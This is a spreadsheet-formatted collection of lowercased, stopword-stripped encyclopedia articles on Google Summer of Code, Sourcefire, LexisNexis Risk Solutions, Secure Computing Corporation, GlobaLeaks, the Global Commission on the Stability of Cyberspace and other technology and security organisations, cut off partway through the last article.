approximately projects successfully completed 2005, although completion rates varied organization: ubuntu, example, reported completion rate 64%, reported completion rate. many projects continued past summer, even though period over, changed direction developed.for first summer code, google criticized giving sufficient time open source organizations could plan projects summer code. despite criticisms organizations involved, including freebsd, apache, kde, ubuntu, blender, mozdev, google itself. according blog post chris dibona, google's open source program manager, "something like percent students stuck groups past [summer code]." mozilla developer gervase markham also commented none google-sponsored mozilla projects survived event. however, gaim (now pidgin) project able enlist enough coding support event include changes gaim (now pidgin) 2.0; jabber software foundation (now xmpp standards foundation) project also counted surviving projects event (kde counted continuing project projects sponsored). 2006 2006, around 6,000 applications submitted, less previous year applicants required google accounts reduced number spam applications received. google mentors found proposals much higher quality 2005's applications. also, number participating organizations doubled 102. addition organizations participated 2005, organizations debian, gnu, gentoo, adium, php, reactos participated 2006. google decided sponsor around projects. student application deadline extended 2006-05-09, 11:00 pdt. although results declared 5:00 pdt, considerable delay publishing google expected several students selected organization. google allows student undertake project part program. took google several hours resolve duplicate acceptances. acceptance letters sent 3:13 pdt, letters also sent 1,600 applicants fact, accepted google's committee. 3:38 pdt, chris dibona posted apology official mailing list, adding "we're deeply sorry this. received e-mails, said accepted not, means not." google released final list projects accepted program website. proposals visible public hours, taken response complaints participants "sensitive private" information applications contained. however, google since resolved issues allowing student involved summer code provide brief abstract message publicly viewable completely separate content actual proposal submitted google. summer code 2006 ended 2006-09-08. according google, students received positive evaluation program. 2007 2007, google accepted organizations students. those organizations total nearly 1500 mentors.students allowed submit applications although could accepted. google received nearly 6,200 applications. allow students apply, google extended application deadline march march last minute. extended march 27.on april acceptance letters delayed additional efforts involved resolving duplicate submissions. point, interface changed application status selected. google officials reported acceptance email definitive indication acceptance. 2008 2008, google chose open source organizations participate summer code, greatly increased year 2006. each organization chosen based number criteria, virtue projects, ideas given students work ability mentors ensure students successfully completed projects. nearly 7100 proposals received 2008 summer code, 1125 selected. university results announced 2008 google's "open source google" blog. according university moratuwa came first "top universities 2008 gsoc applicants" "top accepted universities 2008 gsoc" categories. wrocław university technology able secure second place "2008 gsoc accepted: universities" category, universidade estadual campinas became second "2008 gsoc applicants: universities" category. 2009 2009 google reduced number software projects 150, capped number student projects would accept 1,000, percent successfully completed.as 2009, university moratuwa lanka ranks first terms number awards received students five-year period 2005–2009 securing accepted students. 2010 2010 google accepted software projects 1,026 students countries worldwide. countries number students accepted 2010 are: united states (197), india (125), germany (57), brazil (50), poland (46), canada (40), china (39), united kingdom (36), france (35), lanka (34). 2011 number organizations increased 175, new. 1,115 students accepted.a total different universities participated program, program. universities highest number students accepted 2011 google summer code account 14.5% students. university moratuwa, lanka secured first position 2011's program accepted students. polytechnic university bucharest, romania second accepted students indian institute technology, kharagpur, india placed third students. breakdown college degrees 2011 google summer code program follows: students undergraduates, 23.3% pursuing master's degrees, 10.2% working phds 11.5% specify degree working toward. 2012 google announced google summer code 2012 february 2012. april 2012, google announced 1,212 proposals accepted organizations. first time since inception, highest number gsoc participants came india (227) followed (173) germany (72). university moratuwa continued dominance selections, followed dhirubhai ambani institute information communication technology leading india rank. first time, mauritius, african country, participated google summer code. 2013 google announced google summer code 2013 february 2013. april 2013, google announced open source projects organizations would take part year. 1,192 student project proposals accepted. this first time cameroon represented program students.. 2014 google announced google summer code 2014 february 2014. april 2014, google announced open source projects organizations would take part year. 1,307 student project proposals accepted. 2014 edition first time students ethiopia, honduras, kenya, malawi uganda accepted program. kenya cameroon taking lead students countries student. 2015 google announced google summer code 2015 february 2015. march 2015, google announced open source projects organizations would take part year, notable exceptions including mozilla, linux foundation, project. student application period began march 2015. accepted student proposals announced april 2015, 1051 student proposals accepted. highest number gsoc participants came india (335) followed (127) lanka (58). 2016 google announced google summer code 2016 february 2016. deadline organization application february 2016. student application period began march 2016, student application deadline march 2016. organizations accepted. 18,981 total registered students 2015) 7,543 student proposals 5,107 students countries. accepted student proposals announced april 2016, 1,206 student proposals accepted. 2017 number organizations increased 201, new. 1,318 students accepted program hailed universities, students participating first time. over 20,651 students countries registered program, 8.8% increase previous high program. 4,764 students countries submitted total 7,089 project proposals. 2018 organizations accepted 2018. 2019 organizations accepted 2019. 2020 organizations 1199 student projects accepted 2020. 2021 organizations 1292 student projects accepted 2021. 2022 google announced massive expansion google summer code program november 2021. updated program allowed anyone participate, significantly broaden scope program used focus students grads. google also rolled medium large projects give open source organizations flexibility tackle complex projects. also outreachy references external links official website internetnews article success rate internetnews article results 2006 (august 2013) google summer code full stats part countries</t>
  </si>
  <si>
    <t>Sourcefire</t>
  </si>
  <si>
    <t>sourcefire, technology company developed network security hardware software. company's firepower network security appliances based snort, open-source intrusion detection system (ids). sourcefire acquired cisco $2.7 billion july 2013. background sourcefire founded 2001 martin roesch, creator snort. company created commercial version snort software, sourcefire system, evolved company's firepower line network security products. company's headquarters columbia, maryland united states, offices abroad. financial company's initial growth funded four separate rounds financing raising total $56.5 million venture investors sierra ventures, enterprise associates, sequoia capital, core capital partners, inflection point ventures, meritech capital partners, cross creek capital, l.p.in 2005, check point software attempted acquire sourcefire $225 million, later withdrew offer became clear authorities would attempt block acquisition. company completed initial public offering march 2007, raising $86.3 million. august year, sourcefire acquired clam antivirus. sourcefire rejected offer $187 million 2008 security appliance vendor barracuda networks, offered us$7.50 share, amounting premium then-current stock price. sourcefire announced acquisition cloud-based antivirus firm immunet january 2011.revenue fourth quarter 2012 $67.4 million compared $53.2 million fourth quarter 2011, increase 27%. revenue year ending december 2012 $223.1 million compared $165.6 million 2011, increase 35%. international revenues $74.4 million, 2011. december 2012, company's cash, cash equivalents, investments totaled $204.0 million.sourcefire received magazine's 2009 "reader trust" award best intrusion detection intrusion prevention system (ids/ips) snort network world's "2009 best tests" award sourcefire system. company placed "leaders" quadrant 2012 gartner magic quadrant competition intrusion detection prevention system appliances, received icsa labs' certification full line firepower (formerly appliances. sourcefire given "recommend" rating 2012 fastest accurate detection labs. firepower also ranked labs 2012 "security value map" security effectiveness total cost ownership.on july 2013, cisco systems announced definitive agreement acquire sourcefire $2.7 billion. products firepower sourcefire firepower line appliances designed form part layered security defense. they deployed next-generation intrusion prevention system (ngips), network visibility hosts, operating systems, applications, services, protocols, users, content, network behavior network attacks malware. next-generation firewall (ngfw) ngips, incorporating access application control, threat prevention firewall capabilities next-generation intrusion prevention system integrated:application control malware protection filteringadvanced malware protection appliance dedicated inline network protection advanced malware. advanced malware protection sourcefire advanced malware protection (amp) offers malware analysis protection networks endpoints using data analytics discover, understand block advanced malware outbreaks, advanced persistent threats (apts) targeted attacks. enables malware detection blocking provisioning continuous analysis retrospective alerting, using sourcefire's cloud security intelligence. advanced malware protection deployed inline product ngips, dedicated firepower appliance endpoints, virtual mobile devices fireamp. snort snort open source network intrusion prevention detection system utilizing rule-driven language, combines signature, protocol anomaly based inspection methods. developed tandem snort open source community, developers claim widely deployed intrusion detection prevention technology worldwide. immunet immunet uses cloud virus definitions along virus definitions clam antivirus open source (gpl) anti-virus toolkit primarily used unix operating systems designed e-mail scanning e-mail gateways. provides number utilities including multi-threaded daemon, command-line interface scanner tool automatic database updates. core package anti-virus engine available form shared library. immunet provided versions, free plus.as june 2014, immunet plus longer available, replaced immunet free, supported cisco.[8] sourcefire vulnerability research team sourcefire vulnerability research team (vrt) group network security engineers discovered assessed trends hacking activities, intrusion attempts, vulnerabilities. members sourcefire include clamav team well authors several standard security reference books articles. sourcefire also supported resources open source snort clamav communities. group focuses developing vulnerability-based rules protect emerging exploits sourcefire customers snort users. provided zero-day protection outbreaks malware, including conficker, netsky, nachi, blaster, sasser, zotob, nachi among others. also delivers rules provide protection microsoft tuesday vulnerabilities, develops official snort rules used sourcefire system, develops maintains official rule snort.org, maintains shared object rules distributed various platforms binary format.following cisco acquisition sourcefire 2014, combined cisco's trac secapps (security applications) group form cisco talos. also antivirus software intrusion detection system (ids) real-time adaptive security notes references external links official website snort homepage clamav homepage</t>
  </si>
  <si>
    <t>LexisNexis Risk Solutions</t>
  </si>
  <si>
    <t>lexisnexis risk solutions global data analytics company provides data technology services, analytics, predictive insights fraud prevention wide range industries. headquartered alpharetta, georgia (part atlanta metropolitan area) offices throughout u.s. australia, brazil, china, france, hong kong sar, india, ireland, israel, philippines u.k. company’s customers include businesses within insurance, financial services, healthcare corporate sectors well local, state federal government, enforcement public safety. lexisnexis risk solutions operates within risk business analytics market segment relx, multinational information analytics company based london. overview market segments lexisnexis risk solutions operates four market segments: insurance services business services health care services government services technology lexisnexis risk solutions uses hpcc systems, also known (data analytics supercomputer), extensively—its software architecture runs commodity computing clusters provide high-performance, data-parallel processing data applications. hpcc systems platform includes data refinery (thor) rapid data delivery engine (roxie) utilize enterprise control language (ecl). lexisnexis risk solutions open-sourced hpcc systems platform 2011, seen success adoption platform diverse entities, example guardhat, makes smart hard hats embedded hpcc systems technology. history subsidiary relx (formerly reed elsevier), lexisnexis risk solutions first began risk information analytics group (riag) within lexisnexis, corporation offering legal database services. 2000, reed elsevier acquired riskwise peoplewise, together became basis riag. creation riag expanded lexisnexis offerings include public records collections. 2000, lexisnexis also launched hpcc systems, data-intensive computing system platform. lexisnexis risk solutions moved collections reed elsevier acquired public records businesses dolan media company 2003. that year, lexisnexis special services inc. (lnssi) founded provide government agencies global sources data fusion technology analytics. lnssi also granted reed elsevier ability participate classified u.s. government programs foreign-owned entity. 2004, reed elsevier purchased seisint inc., based boca raton, florida. seisint housed operated multistate anti-terrorism information exchange (matrix). september 2008, reed elsevier purchased data aggregator choicepoint. this acquisition included insurance business c.l.u.e. database, underwriting database u.s. auto insurance market. lexisnexis completed migration public records hpcc systems year. launch september 2009, choicepoint integrated risk information analytics group (riag), combined entity became lexisnexis risk solutions. 2011, lexisnexis risk solutions officially launched separate company within reed elsevier portfolio. mark kelsey named lexisnexis risk solutions december 2012. over next years company purchased companies including: worldcompliance, enclarity, mapflow, tracesmart, wunelli health market science. divestiture january 2013, lexisnexis risk solutions announced would sell background screening business palo alto-based private equity firm symphony technology group (stg). planned combine lexisnexis screening portfolio company, first advantage. insurance initiatives ltd. (2016) july 2016, lexisnexis risk solutions acquired insurance initiatives ltd. (iil), data distribution platform extracts, hosts processes large quantities data deliver information point-of-quote u.k.'s property casualty insurance industry. threatmetrix (2018) relx purchased threatmetrix, digital identity risk-based authenticator platform, february 2018. lumen (2019) 2019, lexisnexis risk solutions purchased lumen, integrated data platform leveraged public safety enforcement numerica corporation. analytics (2020) january 2020, lexisnexis risk solutions closed acquisition analytics, provider fraud credit risk solutions. previously analytics nortonlifelock company. emailage (2020) march 2020, lexisnexis risk solutions, acquired emailage, arizona-based fraud prevention risk management solutions provider. governance lexisnexis risk solutions subsidiary relx (tickers: relx rel.uk). lexisnexis risk solutions reed business information compose relx’s risk business analytics market segment, mark kelsey overseen relx board directors. corporate social responsibility missing children u.s. lexisnexis risk solutions developed adam (automated delivery alerts missing children) program 2000 help national center missing exploited children (ncmec) find missing children. adam distributes missing child alert posters enforcement, hospitals, libraries businesses within specific geographic search areas. system expanded 2017 allow individuals receive email alert child reported missing near them.in 2017, feature added adam allow ncmec focus highway missing child abductor travelling distribute posters recipients along relevant corridor. combining filter along system’s radius search allows broad, targeted, poster coverage. functionality added adam allow members public sign missing child email alerts area. more million individuals, private enterprises, hospitals, schools, news outlets agencies signed receive automated adam alerts. u.k. 2017, lexisnexis risk solutions began working charity missing people national crime agency support child rescue alert service, disseminates missing alerts text message. along charlie hedges advisory (one u.k.’s foremost experts missing persons), lexisnexis risk solutions missing people scoped training course assist enforcement, schools, hospitals others missing cases, particularly involving children abducted and/or trafficked. food stamp fraud prevention since 2013, florida department children families used lexisnexis risk solutions identity management solutions prevent food stamp fraud improve operational efficiencies, achieving total cost avoidance $843.7 million. humanitarian emergency education 2017, lexisnexis risk solutions developed global business coalition education’s rapid education action (react) database record private sector educational contributions assets deployed quickly wake humanitarian emergency. enforcement psde database public safety data exchange (psdex) contributory database 1,300 enforcement agencies across u.s. created lexisnexis risk solutions. psdex helps participants solve crimes, identify threats anticipate future threats. lexisnexis risk solutions created advisory committee advise policy governance psdex data, help assure adherence federal criminal justice information services (cjis), state local standards security privacy enforcement-provided data. psdex advisory committee composed former federal bureau investigation (fbi), secret service, metropolitan police department criminal justice experts, partnership lexisnexis risk solutions leaders. lexisnexis accurint virtual crime center lexisnexis accurint virtual crime center gives enforcement “greater visibility crime jurisdictions nationwide linking billions public records agency-provided data.” links psdex brings together disconnected data provide comprehensive view people’s identities enforcement agencies better target investigations, identify patterns, predict upcoming events deploy resources efficiently. covid-19 covid-19 analyzer april, 2020, lexisnexis risk solutions created free tracking tool monitor report progress covid-19 virus provide better contextual understanding pandemic’s evolution. using data johns hopkins university (daily cases deaths), census bureau population) desa (world population), tracker provides metrics analysis locations across globe, maps drill country regional levels, helping understand virus propagating.in july 2020, researchers florida atlantic university’s college engineering computer science collaboration lexisnexis risk solutions, received grant rapid research (rapid) national science foundation develop model covid-19 spread using innovative data analytics techniques tools. project leverages prior experience modeling ebola spread successfully model spread covid-19. covid-19 data resource center health care segment lexisnexis risk solutions announced april 2020 launch free covid-19 data resource center provide county-level insights at-risk populations potential care capacity gaps support u.s. healthcare industry’s response covid-19 pandemic. combining data analytics industry stakeholders, company created insights used healthcare organizations, public health officials health researchers help allocate resources populations greatest need. covid-19 data resource center features heat maps insights identify at-risk populations correlated gaps provider coverage. each county assigned percentile rank scale (low-risk) (high-risk) across various parameters. updated regularly quickly address care needs community. june 2020, group added national telehealth trending insights covid-19 data resource center show exponential growth telehealth adoption resulting covid-19 pandemic. also lexisnexis relx national center missing exploited children references</t>
  </si>
  <si>
    <t>Gordon–Loeb model</t>
  </si>
  <si>
    <t>gordon–loeb model mathematical economic model analyzing optimal investment level information security. investing protect company data involves cost that, unlike investments, usually generate profit. does, however, serve prevent additional costs. thus, important compare expensive protect specific data, potential loss case said data stolen, lost, damaged corrupted. draft model, company must possess knowledge three parameters: much data worth; much data risk; probability attack data going successful, vulnerability.these three parameters multiplied together provide median money loss security investment.from model gather amount money company spends protecting information should, cases, small fraction predicted loss (for example, expected value loss following security breach). specifically, model shows generally inconvenient invest informatics security (including cybersecurity computer security related activities) amounts higher predicted loss. gordon–loeb model also shows that, specific level potential loss, amount resources invest order protect information always increase increase vulnerability said set. thus, companies enjoy greater economic returns investing cyber/information security activities aimed increase security data sets medium level vulnerability. words, investment safeguarding company's data reduces vulnerability decreasing incremental returns. gordon–loeb model first published lawrence gordon martin loeb 2002 paper, transactions information system security, entitled "the economics information security investment" paper reprinted 2004 book economics information security. gordon loeb professors university maryland's robert smith school business. gordon–loeb model well accepted analytical models economics cyber security. model widely referenced academic practitioner literature. model also empirically tested several different settings. research mathematicians marc lelarge yuliy baryshnikov generalized results gordon–loeb model. gordon–loeb model featured popular press, wall street journal financial times. references</t>
  </si>
  <si>
    <t>Google Optimize</t>
  </si>
  <si>
    <t>google optimize, (go) formerly called google website optimizer, freemium analytics testing tool google. allows running experiments aimed help online marketers webmasters increase visitor conversion rates overall visitor satisfaction.the google optimize website used design experiments open wyswig editor version tested experiment. free version allows running experiments time user needs upgrade google optimize them. there also limits including limited audience targeting options.the google optimize editor chrome extension allows changing aspects visible html elements. changes applied javascript tailored rules experiment. changes include replacing labels buttons links style changes like font change, text alignment such. also modify html inside chosen elements allows adding advanced changes. this allows presenting alternative version static page different users. allows running tests test multiple combinations page elements headings, images, body copy; known multivariate testing. could used multiple stages conversion funnel. editor alone work creating complicated tests especially pages dynamic content angular, react. complicated, dynamic pages, manual work programmers required integrate experiments frontend backend code.on june 2012, google announced google website optimizer (the predecessor google optimize) separate product would retired august 2012, functionality would integrated google analytics google analytics content experiments. however, google revived google website optimizer google optimize, allows connecting google analytics tests design experiments website. google optimize part google marketing platform. also google pagespeed tools google analytics google search console google trends google search google google manager google manager gmail google drive references</t>
  </si>
  <si>
    <t>Good Smartphone Activated Medics</t>
  </si>
  <si>
    <t>goodsam global emergency volunteer service platform associated community co-founded mark wilson obe, ghorbangholi haddad 2013. used ambulance, police, fire, government, charity health services improve immediate emergency management, largely video enabling instant-on-scene video assessment platform’s ability alert trusted responders provide immediate help. also platform used deploy nearly 800,000 volunteers across support isolating suffering covid platform used globally extensive roll outs zealand, australia, usa, canada papua guinea. origins cardiac arrest goodsam platform originally created minimise hypoxic brain injury following trauma phenomenon known impact brain apnoea, however, role cardiac arrest emergencies immediately apparent. system adopted london ambulance service, ambulance victoria john zealand saved many lives. subsequently rolled ambulance services across others around world. goodsam cardiac responder network highly governed organisations platform. works alerting trained cardiac arrests nearby integration local ambulance fire service. they provide ambulance route. platform also large defibrillator registry thanks network volunteers registering defibrillators. evidence benefit cardiac arrest there many surviviors thanks goodsam responder starting using prior ambulance arrival. study using early data, responder density relatively demonstrated goodsam responder increased odds ratio survival three different ambulance services. instant-on-scene video providing immediate care 2015 goodsam introduced “instant-on-scene” powerful video system revolutionising emergency care. enables emergency services locate emergency caller open mobile phone camera simply sending text email. this unlike standard video conferencing systems specifically designed emergency use. video forwarded controlled highly secure, auditable, governed manner. this sharing within services enables better situational awareness response. video system integrated ambulance police services national video system. evidence benefit instant-on-scene video multiple studies shown evidence benefit. linderoth (2021) demonstrated emergency calls goodsam video altered assessment patient’s condition calls altered emergency response 27.5%. team also demonstrated significant improvement rate, depth position goodsam video assisted cpr. coronavirus uk's volunteer response programme because goodsam’s ability connect need help, became platform support volunteer responder programme. this programme recruited 800,000 volunteers providing range supporting roles local community shield isolate covid. roles include check chat, delivery food, pharmacies, pulse oximeters, transport patients equipment volunteer vaccination stewards. this spawned concept “micro-volunteering” well positive legacies pandemic. goodsam used manage volunteers response coronavirus pandemic. police fire goodsam’s platform integrated half police services. instant location function saved many lives, people trapped lorries people abducted. video functionality changing domestic abuse management enabling officers assess situations remotely. there many features spot policing police references external links official website</t>
  </si>
  <si>
    <t>Spanish Network of Excellence on Cybersecurity Research</t>
  </si>
  <si>
    <t>spanish network excellence cybersecurity research (renic), research initiative promote cybersecurity interests spain. members board directors (2018) president: universidad málaga vicepresident: csic treasurer: universidad politécnica madrid secretary: universidad granada vocals: tecnalia, universidad laguna universidad modragón board directors (2016) president: universidad carlos madrid vicepresident: universidad politécnica madrid treasurer: universidad granada secretary: universidad león vocals: gradiant, tecnalia, universidad málaga founding members centro andaluz innovación tecnologías información comunicaciones (citic). consejo superior investigaciones científicas (csic). centro tecnolóxico telecomunicaciones galicia (gradiant). instituto imdea software. instituto nacional ciberseguridad (incibe). mondragón unibertsitatea. tecnalia. universidad carlos madrid. universidad castilla mancha. universidad granada. universidad laguna. universidad león. universidad málaga. universidad murcia. universidad vigo. universidad internacional rioja. universidad politécnica madrid. universidad juan carlos. members consejo superior investigaciones científicas (csic). centro tecnolóxico telecomunicaciones galicia (gradiant). instituto imdea software. instituto nacional ciberseguridad (incibe). mondragón unibertsitatea. tecnalia. universidad carlos madrid. universidad castilla-la mancha. universidad granada. universidad laguna. universidad león. universidad málaga. universidad murcia. universidad vigo. universidad politécnica madrid. universidad juan carlos. universitat oberta catalunya. ikerlan. honorary members centre development industrial technology (cdti). (2017) instituto nacional ciberseguridad (incibe). (2016) initiatives participations renic ecso member, also member board directors. collaboration agreement renic innovative business cluster cybersecurity (aei cybersecurity) signed. renic pleased sponsor cybersecurity research national conferences (jnic) jnic2017 edition, organized universidad juan carlos. renic pleased announce publication online version catalog knowledge cybersecurity research references</t>
  </si>
  <si>
    <t>Secure Network Programming</t>
  </si>
  <si>
    <t>secure network programming (snp) prototype first secure sockets layer, designed built networking research laboratory university texas austin, simon lam. this work published 1994 usenix summer technical conference. project, authors 2004 software system award. this work began 1991 theoretical investigation networking research laboratory formal meaning protocol layer satisfying upper interface specification service provider lower interface specification service consumer.a case study adding security layer application network layers presented.the networking research laboratory received grant national security agency june 1991 investigate apply theory modules interfaces security verification. time, three well-known authentication systems built (mit's kerberos) developed (dec's ibm's kryptoknight). systems suffered common drawback, namely, export clean easy-to-use interface could readily used internet applications. example, would take tremendous amount effort “kerberize” existing distributed application. toward goal "secure network programming masses," inventors conceived secure sockets high-level abstraction suitable securing internet applications. 1993, designed built prototype snp. designed application sublayer sockets, provides user interface closely resembling sockets. this resemblance design security could retrofitted existing socket programs minor modifications. also, sublayer carefully designed implementation thoroughly debugged, easily used internet application uses sockets end-to-end communications. this natural idea hindsight but, 1993, novel major departure mainstream network security research time. snp's secure sockets support stream datagram semantics security guarantees (i.e., data origin authenticity, data destination authenticity, data integrity, data confidentiality.) many ideas design choices found subsequent secure sockets layers, including: placing authenticated communication endpoints application layer, public cryptography authentication, handshake protocol establishing session state including shared secret, symmetric cryptography data confidentiality, managing contexts credentials secure sockets layer. paper presented june 1994 usenix summer technical conference includes system design together performance measurement results prototype implementation clearly demonstrate practicality secure sockets layer. invented secure sockets internet applications general, independently concurrently design development http protocol world-wide still infancy 1993. subsequent secure socket layers (ssl netscape ietf), re-implemented several years later using ideas first presented snp, enabled secure e-commerce browsers servers. today, many internet applications (including email) https consists http running secure sockets layer. references</t>
  </si>
  <si>
    <t>Secure Computing Corporation</t>
  </si>
  <si>
    <t>secure computing corporation (scc) public company developed sold computer security appliances hosted services protect users data. mcafee acquired company 2008. company also developed filtering systems used governments iran saudi arabia blocks citizens accessing information internet. company history 1984, research group called secure computing technology center (sctc) formed honeywell minneapolis, minnesota. centerpiece sctc work security-evaluated operating systems nsa. this work included secure target (sat) logical coprocessing kernel (lock), designed meet stringent level trusted computer systems evaluation criteria (tcsec). over next several years, secure computing morphed small defense contractor commercial product vendor, largely investment community much less interested purchasing security goods defense contractors commercial product vendors, especially vendors growing internet space. secure computing became publicly traded company 1995. following pattern internet-related startups, stock price tripled first day: opened share closed $48. price peaked around next several weeks collapsed following year ranged roughly afterward company purchased mcafee. company headquarters moved jose, california, 1998, though bulk workforce remained twin cities. roseville employees completed move paul, minnesota, february 2006. several sites exist, largely result mergers. mergers acquisitions secure computing consisted several merged units, oldest enigma logic, inc., started around 1982. bosen, founder, claims created first security token provide challenge–response authentication. bosen published computer game trs-80 home computer 1979, called space raiders, used simple challenge–response mechanism copy protection. people used mechanism encouraged repackage remote authentication. bosen started enigma logic filed patents 1982–83; patent issued united kingdom 1986. ultimately, "challenge" portion challenge–response eliminated produce one-time password token similar securid product. enigma logic merged secure computing corporation 1996. secure computing acquired smartfilter product line purchasing webster network strategies, producer webtrack product, 1996. acquisition included domain name webster.com, eventually sold publishers webster's dictionary. shortly acquiring webster/smartfilter product, secure computing merged border network technologies, canadian company selling borderware firewall. border network technologies boasted excellent product highly developed sales channels; said sales channels major inducement merger. although plan completely merge borderware product sidewinder, offer single product existing users products, never quite succeeded. 1998, borderware business unit sold company, borderware technologies inc., formed original borderware founders. time, mergers yielded highly distributed company offices minnesota, florida, california, three ontario. this proved unwieldy, company scaled back offices minnesota california. 2002, company took gauntlet firewall product network associates. 2003, secure computing acquired n2h2, makers bess filtering package. there consolidation bess smartfilter, bess referred "smartfilter, bess edition" company literature. acquisition cyberguard announced august 2005 approved january 2006. year earlier, cyberguard attempted acquire secure computing, proposal rejected). this largest merger secure computing time resulted addition several product lines, including three classes firewalls, content protocol filtering systems, enterprise-wide management system controlling products. several offices also added, including cyberguard's main facility deerfield beach, florida, well webwasher development office paderborn, germany, snapgear development office brisbane, australia. 2006, company merged atlanta-based ciphertrust, developer email security solutions. merger announced july 2006 completed august 2006. july 2008, secure computing announced intention sell safeword authentication product line aladdin knowledge systems, leaving company business focused web/mail security firewalls. sale concluded later year. september 2008, mcafee announced intention acquire secure computing. acquisition completed long afterwards, combined company formed world's largest dedicated security company time. products trustedsource reputation system trustedsource, reputation system secure computing obtained part ciphertrust acquisition, technology company, enabling product lines global intelligence capability based behavioral analysis traffic patterns company's email, firewall devices hosted services, well numerous partners. trustedsource derived real-time reputation scores ips, urls, domains, mail/web content based variety data mining/analysis techniques, support vector machine, random forest, term-frequency inverse-document frequency (tfidf) classifiers. security company's flagship security product line secure appliance (formerly known webwasher). provided anti-malware protection, trustedsource reputation-enabled filtering controls, content caching, scanning capabilities. june 2008, secure computing launched secure protection service, in-the-cloud hosted security service provided similar features secure appliance, without requiring on-premises equipment software. mail security company's flagship email security product line secure mail appliance (formerly known ironmail). provided trustedsource reputation-enabled anti-spam, data-leakage protection (dlp), encryption anti-malware capabilities. secure firewalls company's flagship firewall product, formerly known sidewinder, renamed mcafee firewall enterprise; mcafee sold sidewinder forcepoint january 2016. over years, secure computing (and antecedent organizations) offered following major lines firewall products: firewall enterprise (sidewinder) historically based secureos, company's derivative bsdi (previously bsd/os), later based freebsd. secure firewall reporter secure firewall commandcenter cyberguard secure snapgear embedded system based μclinux classic built unixware (total stream protection) built linux borderware sold off, noted previously securezone discontinued firewall discontinued gauntlet built solaris, nearly phased outthe sidewinder firewall incorporated technical features high-assurance lock system, including type enforcement, technology later applied selinux. however, interaction secure computing open source community spotty company's ownership patents related type enforcement. sidewinder never really tried achieve tcsec rating, earn eal-4+ common criteria rating. along sidewinder, gauntlet earliest application layer firewalls; developed large customer base united states department defense. gauntlet originally developed trusted information systems (tis) commercial version firewall toolkit, early open source firewall package developed darpa contract. company products governmental censorship opennet initiative studied filtering software used governments block access citizens found secure computing's smartfilter program heavily used iranian saudi governments. according secure computing, software iran without consent—u.s. sanctions prohibit american companies dealings iran—and 2005 company said actively working stop illegal use.in response company, jonathan zittrain, co-director harvard school's berkman center internet society, stated, "[t]he fact remains software extended period time there. we've seen secure computing software turn iran. we've seen saudi arabia well."in 2001 york times reported secure computing companies competing saudi government's contract software block citizens' access websites deemed offensive. company already deal saudis expire 2003. defense, secure computing always stated cannot control customers product sold. according opennet initiative's 2007 report, saudi government's censorship "most extensively covers religious social content, though sites relating opposition groups regional political human rights issues also targeted."the governments united arab emirates, oman, sudan, tunisia also actively smartfilter. tunisian government goes redirect blocked pages fake error page, hide fact blocking software used. tunisian government generally recognized poor record comes right free expression. also forcepoint references external links secure computing corporation site cost profile highly assured, secure operating system, overview lock system.</t>
  </si>
  <si>
    <t>GlobaLeaks</t>
  </si>
  <si>
    <t>globaleaks open-source, free software intended enable secure anonymous whistleblowing initiatives. history project started december 2010 first software prototype announced september 2011.relevant figures first development arturo filastò, claudio agosti, fabio pietrosanti, giovanni pellerano, michele orrù. operation globaleaks utilizes onion services order guarantee anonymity source.once submission performed data encrypted made available configured recipients. platform store anything permanently submitted information files deleted soon possible strict data retention policy.the process generally improved suggesting sources recipients qubes tails operating systems connecting platform. implementations 2021, globaleaks internationalized languages implemented several thousands projects initiatives world. vast range adopters include independent media, activists, media agencies, corporations, more. 2013, free press unlimited (fpu), netherland-based non-profit organization, created publeaks foundation counts around country's biggest media organizations among members uses platform perform investigative journalism umbrella project. replicated successful model countries creating méxicoleaks, indonesialeaks, leaks.ng kenekanko mexico, indonesia, nigeria mali respectively. mexicoleaks aimed revealing information public interest mexico awarded 2016 frida award. another project, africaleaks, discontinued.awp, belgium-based organization, created ljost (iceland), filtrala (spain), ecuadortransparente (ecuador) peruleaks (peru).one successful globaleaks projects wildleaks, world's first whistleblower initiative dedicated wildlife forest crime funded managed elephant action league (eal) reported investigated various crimes. investigations highlighted award-winning netflix documentary ivory game.globaleaks also partnered major anticorruption human rights ngos like transparency international (allerta anticorruzione), occrp (occrpleaks) amnesty international (amlea).in 2017, xnet, activist project working networked democracy digital rights since 2008, launched barcelona city hall first public anti-corruption complaint using anonymity protection technology like globaleaks ("bústia ètica" catalan). with pioneering project, barcelona city hall first municipal government invite citizens tools enable send information secure, guarantees privacy gives citizens option totally anonymous.in 2018 italian anti-corruption authority (anac), administrative watchdog, launched national online whistleblowing platform using globaleaks onion services, giving whistleblowers come forward secure report illegal activity protecting identities.since 2020 software recommended transparency international among available secure, ethical free solutions could used implement whistleblowing systems anticorruption purposes. funding globaleaks project maintains public transparent documentation funds partners supported research development. also securedrop whistleblowing wikileaks references external links official website</t>
  </si>
  <si>
    <t>Global Commission on the Stability of Cyberspace</t>
  </si>
  <si>
    <t>global commission stability cyberspace multistakeholder internet governance organization, dedicated creation diplomatic norms governmental non-aggression cyberspace. operated three years, 2017 2019, produced diplomatic norm chartered seven others. origins together global forum cyber expertise, gcsc product 2015-2017 dutch chairmanship london process, particularly work wouter jurgens who, head cyber security department dutch ministry foreign affairs, responsibility organizing global conference cyberspace ministerial, held hague april 16-17 2015, formalizing outcomes.jurgens working several years topic governmental non-aggression cyberspace, collaboration rosenthal, bill woodcock, olaf kolkman, james lewis, others would subsequently become gcsc commissioners.the gcsc launched dutch foreign minister bert koenders 53rd munich security conference, february 2017, three-year charter, issued final report paris peace forum, november 2019. published norms norm protect public core internet "state non-state actors neither conduct knowingly allow activity intentionally substantially damages general availability integrity public core internet, therefore stability cyberspace." norm protect public core gcsc's principal product, included referenced many subsequent legislative diplomatic work. included european union's cybersecurity act, extends mandate european union agency cybersecurity include protection public core. paris call trust security cyberspace included call compliance public core norm. united nations cites public core norm 2019 report secretary general report secretary general’s high-level panel digital cooperation, digital interdependence. norm protect electoral infrastructure "state non-state actors must pursue, support allow cyber operations intended disrupt technical infrastructure essential elections, referenda plebiscites." norm avoid tampering "state non-state actors tamper products services development production, allow tampered with, substantially impair stability cyberspace." norm against commandeering devices botnets "state non-state actors commandeer general public’s resources botnets similar purposes." norm states create vulnerabilities equities process "states create procedurally transparent frameworks assess whether disclose publicly known vulnerabilities flaws aware information systems technologies. default presumption favor disclosure." norm reduce mitigate significant vulnerabilities "developers producers products services stability cyberspace depends prioritize security stability, take reasonable steps ensure products services free significant vulnerabilities, take measures timely mitigate vulnerabilities later discovered transparent process. actors duty share information vulnerabilities order help prevent mitigate malicious cyber activity." norm basic cyber hygiene foundation defense "states enact appropriate measures, including laws regulations, ensure basic cyber hygiene." norm against offensive cyber operations non-state actors "non-state actors engage offensive cyber operations state actors prevent 